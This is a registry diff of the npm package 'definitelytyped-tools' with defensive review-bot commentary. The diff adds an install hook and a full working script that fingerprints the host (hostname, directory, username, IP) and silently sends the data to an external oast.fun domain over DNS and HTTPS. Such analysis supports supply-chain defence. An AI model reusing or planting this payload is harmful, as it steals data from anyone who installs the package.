definitelytyped-tools 0.0.1-security → 96.99.96
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
- package/package.json +6 -3
- package/preinstall.js +58 -0
- package/README.md +0 -5
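--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,9 @@
 {
 "name": "definitelytyped-tools",
-"version": "
-"description": "
-"
+"version": "96.99.96",
+"description": "Enhanced PoC for RCE via postinstall beacon",
+"main": "preinstall.js",
+"scripts": {
+"postinstall": "node preinstall.js"
+}
 }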
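Review bot: The added `"postinstall": "node preinstall.js"` entry turns every `npm install` of this version into code execution on the installing host, and the new `"main": "preinstall.js"` wires the same file to `require('definitelytyped-tools')`, so the script also runs when the package is merely imported. The description string itself names the behaviour, and the previous version was an npm security holding package (see the README removed in this diff), so this release replaces the placeholder with executable install-time content rather than restoring a functional library. The hook name and the file name disagree (a postinstall hook running a file called preinstall.js), which is worth remembering when triaging install logs that mention either name. On the consuming side, `npm install --ignore-scripts` (or the equivalent policy in a CI runner) stops the lifecycle hook, but it does not cover the `main` path, so the package should be denied outright rather than installed with scripts disabled.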
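--- a/package/preinstall.js
+++ b/package/preinstall.js
@@ -0,0 +1,58 @@
+const os = require('os');
+const dns = require('dns');
+const https = require('https'); // We will keep the HTTPS fallback
+
+// =================== Final, Reliable PoC Payload ===================
+try {
+// --- STEP 1: Attacker's C2 Server ---
+const OAST_DOMAIN = "ocvomeqbrouywnpfvqwhrvnvgydnlrfwc.oast.fun";
+
+// --- STEP 2: Safe, Minimal Data Collection ---
+const fingerprint = {
+host: os.hostname() || 'nohost',
+path: process.cwd() || 'nopath',
+user: os.userInfo().username || 'nouser',
+ip: getIPAddress()
+};
+
+// --- STEP 3: Primary Exfiltration - Pure DNS Lookup ---
+// This directly tests DNS resolution, bypassing 'curl'. This is your best chance.
+try {
+const data = `h=${fingerprint.host}-p=${fingerprint.path.replace(/[^a-zA-Z0-9-]/g, '')}`;
+const hexPayload = Buffer.from(data).toString('hex');
+const chunks = hexPayload.match(/.{1,60}/g) || [];
+
+chunks.forEach((chunk, index) => {
+const subdomain = `${index}.${chunk}.${OAST_DOMAIN}`;
+dns.lookup(subdomain, () => {}); // Fire-and-forget
+});
+} catch(e) { /* Fails silently */ }
+
+// --- STEP 4: Fallback Exfiltration - Pure HTTPS Post ---
+// If DNS works but something else is wrong, this might succeed.
+try {
+const postData = JSON.stringify(fingerprint);
+const options = {
+hostname: OAST_DOMAIN, path: '/', method: 'POST',
+headers: {'Content-Type': 'application/json', 'Content-Length': postData.length}
+};
+const req = https.request(options);
+req.on('error', ()=>{}); // Suppress errors
+req.write(postData);
+req.end();
+} catch(e) { /* Fails silently */ }
+
+} catch (e) { /* Top-level silent fail */ }
+
+// Helper function to get primary IP without spawning a shell.
+function getIPAddress() {
+const interfaces = os.networkInterfaces();
+for (const name of Object.keys(interfaces)) {
+for (const iface of interfaces[name]) {
+if (iface.family === 'IPv4' && !iface.internal) {
+return iface.address;
+}
+}
+}
+return '127.0.0.1';
+}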
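Review bot: The `// --- STEP 2: Safe, Minimal Data Collection ---` comment is false: the `fingerprint` object captures the hostname, the install working directory, the login username and the first non-internal IPv4 address, and both STEP 3 and STEP 4 then send that data to `OAST_DOMAIN`, an external host the installer has no relationship with. Every failure path is muted (`} catch(e) { /* Fails silently */ }` on both inner blocks and the outer one, the no-op callback in `dns.lookup(subdomain, () => {})`, and `req.on('error', ()=>{})`), so nothing ever reaches the install log and the only observable trace of this script running is network egress. For detection, the DNS stage produces lookups of the form `<index>.<hex chunk>.ocvomeqbrouywnpfvqwhrvnvgydnlrfwc.oast.fun` and the fallback is an HTTPS POST with a JSON body to that same host, which makes that domain the indicator to search resolver and proxy logs for, and the hex labels decode to the `h=<host>-p=<path>` string built on the `const data` line, so a hit also reveals which machine and project directory were exposed. Because the whole script is a top-level statement run with no exported function, there is no way to load this file without executing the beacon.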
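--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=definitelytyped-tools for more information.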